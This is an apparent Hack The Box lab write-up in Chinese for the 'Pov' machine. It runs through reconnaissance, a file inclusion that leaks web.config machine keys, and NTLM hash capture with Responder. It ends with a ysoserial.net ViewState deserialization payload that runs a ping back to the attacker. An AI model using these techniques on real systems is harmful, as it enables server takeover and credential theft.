Pov
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# nmap 10.129.230.183 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-11 08:31 EST
Nmap scan report for 10.129.230.183
Host is up (0.087s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# nmap 10.129.230.183 -p 80 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-11 08:32 EST
Nmap scan report for 10.129.230.183
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.81 seconds
1.1.2. 子域名爆破
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://pov.htb/ -H "Host: FUZZ.pov.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://pov.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.pov.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 822ms]
:: Progress: [4989/4989] :: Job [1/1] :: 458 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
存在 dev.pov.htb 这个子域名
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# dirsearch -u pov.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/pov/reports/_pov.htb/_25-12-11_09-00-53.txt
Target: http://pov.htb/
[09:00:59] Starting:
[09:01:00] 301 - 141B - /js -> http://pov.htb/js/
[09:01:19] 301 - 142B - /css -> http://pov.htb/css/
[09:01:20] 400 - 3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[09:01:25] 301 - 142B - /img -> http://pov.htb/img/
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[09:01:26] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[09:01:26] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[09:01:26] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[09:01:26] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[09:01:26] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[09:01:26] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
Task Completed
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# dirsearch -u dev.pov.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/pov/reports/_dev.pov.htb/_25-12-11_09-02-18.txt
Target: http://dev.pov.htb/
[09:02:24] Starting:
[09:02:26] 302 - 188B - /%C0%AE%C0%AE%C0%AF -> http://dev.pov.htb/portfolio/%C3%80%C2%AE%C3%80%C2%AE%C3%80%C2%AF
[09:02:26] 302 - 148B - /%3f/ -> /default.aspx?aspxerrorpath=/?/
[09:02:26] 302 - 158B - /%ff -> http://dev.pov.htb/portfolio/%C3%BF
[09:02:33] 302 - 153B - /a%5c.aspx -> /default.aspx?aspxerrorpath=/a/.aspx
[09:02:33] 302 - 164B - /account/login.aspx -> /default.aspx?aspxerrorpath=/account/login.aspx
[09:02:33] 302 - 165B - /accounts/login.aspx -> /default.aspx?aspxerrorpath=/accounts/login.aspx
[09:02:34] 302 - 167B - /adm/admloginuser.aspx -> /default.aspx?aspxerrorpath=/adm/admloginuser.aspx
[09:02:34] 302 - 160B - /adm/index.aspx -> /default.aspx?aspxerrorpath=/adm/index.aspx
[09:02:34] 302 - 155B - /admin%20/ -> /default.aspx?aspxerrorpath=/admin%20/
[09:02:35] 302 - 152B - /admin. -> /default.aspx?aspxerrorpath=/admin.
[09:02:35] 302 - 164B - /admin/account.aspx -> /default.aspx?aspxerrorpath=/admin/account.aspx
[09:02:35] 302 - 168B - /admin/admin-login.aspx -> /default.aspx?aspxerrorpath=/admin/admin-login.aspx
[09:02:35] 302 - 162B - /admin/admin.aspx -> /default.aspx?aspxerrorpath=/admin/admin.aspx
[09:02:35] 302 - 168B - /admin/admin_login.aspx -> /default.aspx?aspxerrorpath=/admin/admin_login.aspx
[09:02:35] 302 - 167B - /admin/adminLogin.aspx -> /default.aspx?aspxerrorpath=/admin/adminLogin.aspx
[09:02:35] 302 - 169B - /admin/controlpanel.aspx -> /default.aspx?aspxerrorpath=/admin/controlpanel.aspx
[09:02:35] 302 - 159B - /admin/cp.aspx -> /default.aspx?aspxerrorpath=/admin/cp.aspx
[09:02:35] 302 - 227B - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:35] 302 - 208B - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:35] 302 - 211B - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:35] 302 - 204B - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:35] 302 - 161B - /admin/home.aspx -> /default.aspx?aspxerrorpath=/admin/home.aspx
[09:02:35] 302 - 162B - /admin/index.aspx -> /default.aspx?aspxerrorpath=/admin/index.aspx
[09:02:35] 302 - 162B - /admin/login.aspx -> /default.aspx?aspxerrorpath=/admin/login.aspx
[09:02:35] 302 - 163B - /admin2/index.aspx -> /default.aspx?aspxerrorpath=/admin2/index.aspx
[09:02:35] 302 - 163B - /admin2/login.aspx -> /default.aspx?aspxerrorpath=/admin2/login.aspx
[09:02:36] 302 - 167B - /admin_area/admin.aspx -> /default.aspx?aspxerrorpath=/admin_area/admin.aspx
[09:02:36] 302 - 167B - /admin_area/index.aspx -> /default.aspx?aspxerrorpath=/admin_area/index.aspx
[09:02:36] 302 - 167B - /admin_area/login.aspx -> /default.aspx?aspxerrorpath=/admin_area/login.aspx
[09:02:38] 302 - 166B - /adminarea/index.aspx -> /default.aspx?aspxerrorpath=/adminarea/index.aspx
[09:02:38] 302 - 166B - /adminarea/admin.aspx -> /default.aspx?aspxerrorpath=/adminarea/admin.aspx
[09:02:38] 302 - 166B - /adminarea/login.aspx -> /default.aspx?aspxerrorpath=/adminarea/login.aspx
[09:02:38] 302 - 169B - /admincontrol/login.aspx -> /default.aspx?aspxerrorpath=/admincontrol/login.aspx
[09:02:38] 302 - 164B - /admincp/index.aspx -> /default.aspx?aspxerrorpath=/admincp/index.aspx
[09:02:39] 302 - 164B - /admincp/login.aspx -> /default.aspx?aspxerrorpath=/admincp/login.aspx
[09:02:39] 302 - 172B - /administrator/account.aspx -> /default.aspx?aspxerrorpath=/administrator/account.aspx
[09:02:39] 302 - 170B - /administrator/index.aspx -> /default.aspx?aspxerrorpath=/administrator/index.aspx
[09:02:39] 302 - 170B - /administrator/login.aspx -> /default.aspx?aspxerrorpath=/administrator/login.aspx
[09:02:42] 302 - 153B - /asset.. -> /default.aspx?aspxerrorpath=/asset..
[09:02:42] 302 - 161B - /auth/login.aspx -> /default.aspx?aspxerrorpath=/auth/login.aspx
[09:02:42] 302 - 165B - /bb-admin/index.aspx -> /default.aspx?aspxerrorpath=/bb-admin/index.aspx
[09:02:42] 302 - 165B - /bb-admin/admin.aspx -> /default.aspx?aspxerrorpath=/bb-admin/admin.aspx
[09:02:42] 302 - 165B - /bb-admin/login.aspx -> /default.aspx?aspxerrorpath=/bb-admin/login.aspx
[09:02:44] 302 - 198B - /ckeditor/ckfinder/core/connector/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/ckeditor/ckfinder/core/connector/aspx/connector.aspx
[09:02:48] 302 - 223B - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console -> /default.aspx?aspxerrorpath=/docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[09:02:49] 302 - 165B - /exchange/logon.aspx -> /default.aspx?aspxerrorpath=/exchange/logon.aspx
[09:02:49] 302 - 164B - /exchange/root.aspx -> /default.aspx?aspxerrorpath=/exchange/root.aspx
[09:02:50] 302 - 221B - /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:50] 302 - 205B - /fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:50] 302 - 202B - /fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:50] 302 - 198B - /fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:53] 302 - 169B - /include/config.inc.aspx -> /default.aspx?aspxerrorpath=/include/config.inc.aspx
[09:02:53] 302 - 207B - /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[09:02:53] 302 - 230B - /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[09:02:53] 302 - 211B - /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[09:02:53] 302 - 214B - /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[09:02:53] 302 - 156B - /index.php. -> /default.aspx?aspxerrorpath=/index.php.
[09:02:54] 302 - 163B - /iwa/iwa_test.aspx -> /default.aspx?aspxerrorpath=/iwa/iwa_test.aspx
[09:02:54] 302 - 168B - /iwa/authenticated.aspx -> /default.aspx?aspxerrorpath=/iwa/authenticated.aspx
[09:02:54] 302 - 170B - /javax.faces.resource.../ -> /default.aspx?aspxerrorpath=/javax.faces.resource.../
[09:02:54] 302 - 260B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[09:02:54] 302 - 227B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/* -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[09:02:54] 302 - 237B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[09:02:54] 302 - 253B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[09:02:54] 302 - 234B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[09:02:54] 302 - 201B - /jolokia/exec/java.lang:type=Memory/gc -> /default.aspx?aspxerrorpath=/jolokia/exec/java.lang:type=Memory/gc
[09:02:54] 302 - 255B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[09:02:54] 302 - 209B - /jolokia/read/java.lang:type=*/HeapMemoryUsage -> /default.aspx?aspxerrorpath=/jolokia/read/java.lang:type=*/HeapMemoryUsage
[09:02:54] 302 - 221B - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used -> /default.aspx?aspxerrorpath=/jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[09:02:54] 302 - 252B - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned -> /default.aspx?aspxerrorpath=/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[09:02:54] 302 - 214B - /jolokia/write/java.lang:type=Memory/Verbose/true -> /default.aspx?aspxerrorpath=/jolokia/write/java.lang:type=Memory/Verbose/true
[09:02:54] 302 - 202B - /jolokia/search/*:j2eeType=J2EEServer,* -> /default.aspx?aspxerrorpath=/jolokia/search/*:j2eeType=J2EEServer,*
[09:02:56] 302 - 163B - /login/cpanel.aspx -> /default.aspx?aspxerrorpath=/login/cpanel.aspx
[09:02:56] 302 - 156B - /login.wdm%2e -> /default.aspx?aspxerrorpath=/login.wdm.
[09:02:56] 302 - 162B - /logon/logon.aspx -> /default.aspx?aspxerrorpath=/logon/logon.aspx
[09:02:57] 302 - 163B - /member/login.aspx -> /default.aspx?aspxerrorpath=/member/login.aspx
[09:02:58] 302 - 164B - /members/login.aspx -> /default.aspx?aspxerrorpath=/members/login.aspx
[09:02:58] 302 - 168B - /modelsearch/index.aspx -> /default.aspx?aspxerrorpath=/modelsearch/index.aspx
[09:02:58] 302 - 168B - /modelsearch/admin.aspx -> /default.aspx?aspxerrorpath=/modelsearch/admin.aspx
[09:02:58] 302 - 168B - /modelsearch/login.aspx -> /default.aspx?aspxerrorpath=/modelsearch/login.aspx
[09:02:59] 302 - 166B - /moderator/admin.aspx -> /default.aspx?aspxerrorpath=/moderator/admin.aspx
[09:02:59] 302 - 166B - /moderator/login.aspx -> /default.aspx?aspxerrorpath=/moderator/login.aspx
[09:03:00] 302 - 166B - /nsw/admin/login.aspx -> /default.aspx?aspxerrorpath=/nsw/admin/login.aspx
[09:03:00] 302 - 162B - /Orion/Login.aspx -> /default.aspx?aspxerrorpath=/Orion/Login.aspx
[09:03:01] 302 - 174B - /pages/admin/admin-login.aspx -> /default.aspx?aspxerrorpath=/pages/admin/admin-login.aspx
[09:03:01] 302 - 177B - /panel-administracion/admin.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/admin.aspx
[09:03:01] 302 - 177B - /panel-administracion/index.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/index.aspx
[09:03:01] 302 - 177B - /panel-administracion/login.aspx -> /default.aspx?aspxerrorpath=/panel-administracion/login.aspx
[09:03:05] 302 - 158B - /rating_over. -> /default.aspx?aspxerrorpath=/rating_over.
[09:03:05] 302 - 171B - /Reports/Pages/Folder.aspx -> /default.aspx?aspxerrorpath=/Reports/Pages/Folder.aspx
[09:03:05] 302 - 182B - /ReportServer/Pages/ReportViewer.aspx -> /default.aspx?aspxerrorpath=/ReportServer/Pages/ReportViewer.aspx
[09:03:06] 302 - 206B - /scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx -> /default.aspx?aspxerrorpath=/scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
[09:03:09] 302 - 166B - /siteadmin/login.aspx -> /default.aspx?aspxerrorpath=/siteadmin/login.aspx
[09:03:09] 302 - 166B - /siteadmin/index.aspx -> /default.aspx?aspxerrorpath=/siteadmin/index.aspx
[09:03:09] 302 - 172B - /sitecore/content/home.aspx -> /default.aspx?aspxerrorpath=/sitecore/content/home.aspx
[09:03:09] 302 - 173B - /sitecore/login/default.aspx -> /default.aspx?aspxerrorpath=/sitecore/login/default.aspx
[09:03:10] 302 - 154B - /static.. -> /default.aspx?aspxerrorpath=/static..
[09:03:13] 302 - 185B - /umbraco/webservices/codeEditorSave.asmx -> /default.aspx?aspxerrorpath=/umbraco/webservices/codeEditorSave.asmx
[09:03:13] 302 - 161B - /user/login.aspx -> /default.aspx?aspxerrorpath=/user/login.aspx
[09:03:14] 302 - 162B - /users/login.aspx -> /default.aspx?aspxerrorpath=/users/login.aspx
[09:03:14] 302 - 167B - /VirtualEms/Login.aspx -> /default.aspx?aspxerrorpath=/VirtualEms/Login.aspx
[09:03:14] 302 - 167B - /virtualems/Login.aspx -> /default.aspx?aspxerrorpath=/virtualems/Login.aspx
[09:03:15] 302 - 155B - /WEB-INF./ -> /default.aspx?aspxerrorpath=/WEB-INF./
[09:03:15] 302 - 165B - /webadmin/admin.aspx -> /default.aspx?aspxerrorpath=/webadmin/admin.aspx
[09:03:15] 302 - 165B - /webadmin/index.aspx -> /default.aspx?aspxerrorpath=/webadmin/index.aspx
[09:03:16] 302 - 165B - /webadmin/login.aspx -> /default.aspx?aspxerrorpath=/webadmin/login.aspx
Task Completed
可以发现网站 pov.htb 是一个静态网站,这种没必要测,优先看 dev.pov.htb ,从目录就可以发现网站是一个ASP.Net的网站
1.2. web
可以发现这里对 ASP.NET 加粗显示了,我怀疑这里是一个提示。
继续往下给了一个很明显的提示
还可以查看他的简历,从简历中也可以看出这个人是搞网站开发的
不是搞安全的
1.3. LFI
35-WebSec/LFI
这里发现有一个下载简历的,抓包发现存在 file 参数
可以修改为其他的试试
修改为网站根目录默认页面 default.aspx
发现也可以访问
说明这里确实存在一个 35-WebSec/LFI
因为是windows 且是ASP.NET网站,所以我很容易就想到去读取 web.config ,如果你想尝试获取更多的东西,可以看看这个字典
发现存在machineKey 那这里可以尝试打一波 NET deserialization
web.config:
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
可以发现请求参数中存在 __VIEWSTATE 是一个ASP.NET框架中很常见的参数,也是很常见被用作返利化的点。
这里也可以通过 NTLM Sniffing 来让对方向我们发起SMB的NTLM认证,从而捕获目标的NTLMv2或者NTLMv哈希
使用 Responder 开启监听,然后把 file 替换为我们的SMB服务器地址
┌──(root㉿kali)-[~]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.87]
Responder IPv6 [dead:beef:2::1055]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-DKONXBWL56I]
Responder Domain Name [BX1C.LOCAL]
Responder DCE-RPC Port [46486]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.230.183
[SMB] NTLMv2-SSP Username : POV\sfitz
[SMB] NTLMv2-SSP Hash : sfitz::POV:1122334455667788:0EBE7FA93AD813C756469CB7F8036DC4:010100000000000000F18405876ADC016320877D64C983A40000000002000800420058003100430001001E00570049004E002D0044004B004F004E005800420057004C0035003600490004003400570049004E002D0044004B004F004E005800420057004C003500360049002E0042005800310043002E004C004F00430041004C000300140042005800310043002E004C004F00430041004C000500140042005800310043002E004C004F00430041004C000700080000F18405876ADC01060004000200000008003000300000000000000000000000002000001A151ACC195AC2A77D3060073C588A8608A757DCD263C839A752A6EEB808A81A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380037000000000000000000
成功获取到了 sfitz 用户的NTLMv2哈希
可以尝试破解
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SFITZ::POV:1122334455667788:0ebe7fa93ad813c756469cb...000000
Time.Started.....: Thu Dec 11 23:21:53 2025 (1 sec)
Time.Estimated...: Thu Dec 11 23:21:54 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 18803.1 kH/s (2.39ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14344388/14344388 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 48c Util: 16% Core:1890MHz Mem:8001MHz Bus:8
Started: Thu Dec 11 23:21:47 2025
Stopped: Thu Dec 11 23:21:54 2025
破解失败
1.4. .NET反序列化
NET反序列化
在前面我们通过LFI获取到了这个网站的 web.config文件。其中包含了 machinekey这个用于加密与验证的关键密钥,通过这个密钥我们可以构造特定的ViewState数据并实现返利化。
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
>>>> <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
在
<system.web>节点中,<machineKey>定义了加密与验证的关键设置,这里使⽤ AES 进⾏加密,并通过提供的密钥来确保数据的完整性和安全性,这通常⽤于保护身份验证票据和 ViewState数据
对于.net反序列化,最常用的工具就是 ysoserial.net
这里先生成一个执行 ping 命令的payload,测试一下是否有效
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping -n 4 10.10.14.87 " --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
WLvMAvIJX%2Fk4hmEq1M%2B%2FFlKCXEIn49bz6xa8zfxjPVs7n%2FypgiicAasUQkm2pxIUb60VUQEo9LT6ro29cQQ25AhtBnMF1HxBUmr4%2BAYXbTsViejOdKNCliy17BPNtx1Bmnvv8q63zORnF%2Bor2YjNa%2FHmrMkAV7%2B6JFwbSeCtR0pUJ6A53a2H3kYXxWrH%2Bzj%2BawjCyZOk%2Bfz4Wa2G8hX4OHoIsVA0mR8VRA%2FVKgj75QjNn8Oux4LJ5rRoM2adECkAvVSH3YQgsqIII%2FqG5ZBrIY6zlPlYZuQqjJrXc7mQF9cVHN1m1ZNlsaHhbp8uGCy6oKBplfBxQNCks%2BQTLRnJiM%2BN195VxciwzReM1rIGGA4uOxaxdIUVbXTXuTV%2F3Espi6K94VBPECf%2Bd3BkiSwy079%2F5%2BD0vTJRqP3uQ2P6%2F900wnMTAyAQarYsvUPplEXnwfRusl0Q%2FITcr7xo7vlJ87Nu3naBQIh%2Ftam4hH809VPpaBryvsT4qxeeRue4DxF%2BL6AmLG6cb8vuKGYrpS%2FZl%2BF0zsqVjiY%2Fivi%2Fw5RkwTXQ1YGlfddMTLCMhJS1SERDtKP2%2BNeqzRLu4GwXgofyXHkjt6WDkvMp3bEf30DZkkotnPW3es1siYqXGnHfdrO%2FZ8QpRCoQNtETvKbFe%2F9WjmVZ27ObCXLl9W63B3LiXZw82%2FJJgkpiAIyBXj2De%2Ba%2Fa%2BKIs9ucDYuaf71UxTd83mCkChmS8qzzH7K9gzTYRKBorFCnZok8aAt4PDvl25Ep8tk4jkbFrwfLV441M7ziyLox1JMWJ35OFW0V9J5Gr%2BplaDWMApJbnpgzeh3nP3jGY7g8QHetyO8ApQHThWbqdH%2FJthaVt7oUJCZOPzrp8xkodNCnAskacxisC7XTGs8RXO2uNDPA608lVcnq5oZ73aGoz1FM8oizzq2eu2YIySfEj4r5R%2B%2BysUbcs2K7%2Fps3UDSGZDG0jXpptySJk43Fz%2F2No3%2Bwji1pzkRst15dM%2F8Z6BCdTi%2BTy5YU32KyHjqf6fZ1J%2F6zJE%2F3XiAUR%2FTWIFGFFpmkFhGM4heoKtrUoqcDUeV5J6AUnnuBZPFDyk9sWcC5JW9y6gsJyLsfjKwaTkroBfYEd%2F47b1UOMKzbozc48PE%2FFcM749O58P0V8Mt%2BxFeTF7d6RrYjF%2BN83%2BAqDHUoEV3eL%2FAPUv%2FC7gM0tcyMtIRvwJNP6iT4aoKwAhPaWvqkGEqCSpIs2YmRfGDeVHnsRGo9%2BAHHoLuooIOVs4Bti0vY1N%2F%2B3YvQSH7OVrimNthWDfnX3VESdp1xEe81b%2B8FC2Y%3D
kali使用tshark开启监听
┌──(root㉿kali)-[~]
└─# tshark -i tun0 -f icmp
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
1 0.000000000 10.129.230.183 → 10.10.14.87 ICMP 60 Echo (ping) request id=0x0001, seq=1/256, ttl=127
